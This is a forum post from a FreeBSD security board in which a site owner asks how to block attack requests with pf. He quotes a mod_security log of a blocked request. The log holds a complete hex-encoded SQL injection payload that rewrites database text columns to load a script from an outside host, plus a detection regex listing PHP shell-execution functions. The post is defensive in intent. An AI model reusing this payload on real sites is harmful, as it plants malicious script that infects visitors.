DaemonForums  

Go Back   DaemonForums > FreeBSD > FreeBSD Security

FreeBSD Security Securing FreeBSD.

 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #1   (View Single Post)  
Old 18th August 2008
hunteronline hunteronline is offline
Fdisk Soldier
 
Join Date: Jul 2008
Posts: 52
Default Generic PHP Exploit

Dropping net garbage with Pf.conf. I can't find a way of blocking/dropping "PHP Exploit" attempts with a basic pf.conf rule. Can anyone point me in the right direction on this?

Thanks

The following is from a mod_security log file:

Request: www.mysite.com 68.97.80.139 - - [18/Aug/2008:14:22:56 +0000] "GET /node/8230?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4 445434C415245204054207661726368617228323535292C404 32076617263686172283430303029204445434C41524520546 1626C655F437572736F7220435552534F5220464F522073656 C65637420612E6E616D652C622E6E616D652066726F6D20737 9736F626A6563747320612C737973636F6C756D6E732062207 76865726520612E69643D622E696420616E6420612E7874797 0653D27752720616E642028622E78747970653D3939206F722 0622E78747970653D3335206F7220622E78747970653D32333 1206F7220622E78747970653D31363729204F50454E2054616 26C655F437572736F72204645544348204E4558542046524F4 D20205461626C655F437572736F7220494E544F2040542C404 3205748494C4528404046455443485F5354415455533D30292 0424547494E20657865632827757064617465205B272B40542 B275D20736574205B272B40432B275D3D5B272B40432B275D2 B2727223E3C2F7469746C653E3C736372697074207372633D2 2687474703A2F2F777777332E3830306D672E636E2F6373727 3732F772E6A73223E3C2F7363726970743E3C212D2D2727207 76865726520272B40432B27206E6F74206C696B65202727252 23E3C2F7469746C653E3C736372697074207372633D2268747 4703A2F2F777777332E3830306D672E636E2F63737273732F7 72E6A73223E3C2F7363726970743E3C212D2D2727272946455 44348204E4558542046524F4D20205461626C655F437572736 F7220494E544F2040542C404320454E4420434C4F534520546 1626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 403 303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" - "-"
----------------------------------------
GET /node/8230?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4 445434C415245204054207661726368617228323535292C404 32076617263686172283430303029204445434C41524520546 1626C655F437572736F7220435552534F5220464F522073656 C65637420612E6E616D652C622E6E616D652066726F6D20737 9736F626A6563747320612C737973636F6C756D6E732062207 76865726520612E69643D622E696420616E6420612E7874797 0653D27752720616E642028622E78747970653D3939206F722 0622E78747970653D3335206F7220622E78747970653D32333 1206F7220622E78747970653D31363729204F50454E2054616 26C655F437572736F72204645544348204E4558542046524F4 D20205461626C655F437572736F7220494E544F2040542C404 3205748494C4528404046455443485F5354415455533D30292 0424547494E20657865632827757064617465205B272B40542 B275D20736574205B272B40432B275D3D5B272B40432B275D2 B2727223E3C2F7469746C653E3C736372697074207372633D2 2687474703A2F2F777777332E3830306D672E636E2F6373727 3732F772E6A73223E3C2F7363726970743E3C212D2D2727207 76865726520272B40432B27206E6F74206C696B65202727252 23E3C2F7469746C653E3C736372697074207372633D2268747 4703A2F2F777777332E3830306D672E636E2F63737273732F7 72E6A73223E3C2F7363726970743E3C212D2D2727272946455 44348204E4558542046524F4D20205461626C655F437572736 F7220494E544F2040542C404320454E4420434C4F534520546 1626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: Keep-Alive
Host: www.mysite.com
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
mod_security-action: 403
mod_security-message: Access denied with code 403. Pattern match "(chr|fwrite|fopen|system|e?chr|passthru|popen|pro c_open|shell_exec|exec|proc_nice|proc_terminate|pr oc_get_status|proc_close|pfsockopen|leak|apache_ch ild_terminate|posix_kill|posix_mkfifo|posix_setpgi d|posix_setsid|posix_setuid|phpinfo)\\(.*\\)\\;" at THE_REQUEST [id "330001"][rev "1"] [msg "Generic PHP exploit pattern denied"] [severity "CRITICAL"]

HTTP/1.1 403 Forbidden
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
--da174d4f--
Reply With Quote
 

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
vbox: possible exploit Mr-Biscuit Other BSD and UNIX/UNIX-like 9 18th October 2008 06:33 PM
Attention A Nwe Local Root Exploit t4y4n OpenBSD General 6 2nd July 2008 01:23 AM
GENERIC.MP kernel failing to boot AMD dual-core system < 75% of the time JMJ_coder NetBSD General 3 9th June 2008 01:54 PM


All times are GMT. The time now is 03:25 PM.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Content copyright © 2007-2010, the authors
Daemon image copyright ©1988, Marshall Kirk McKusick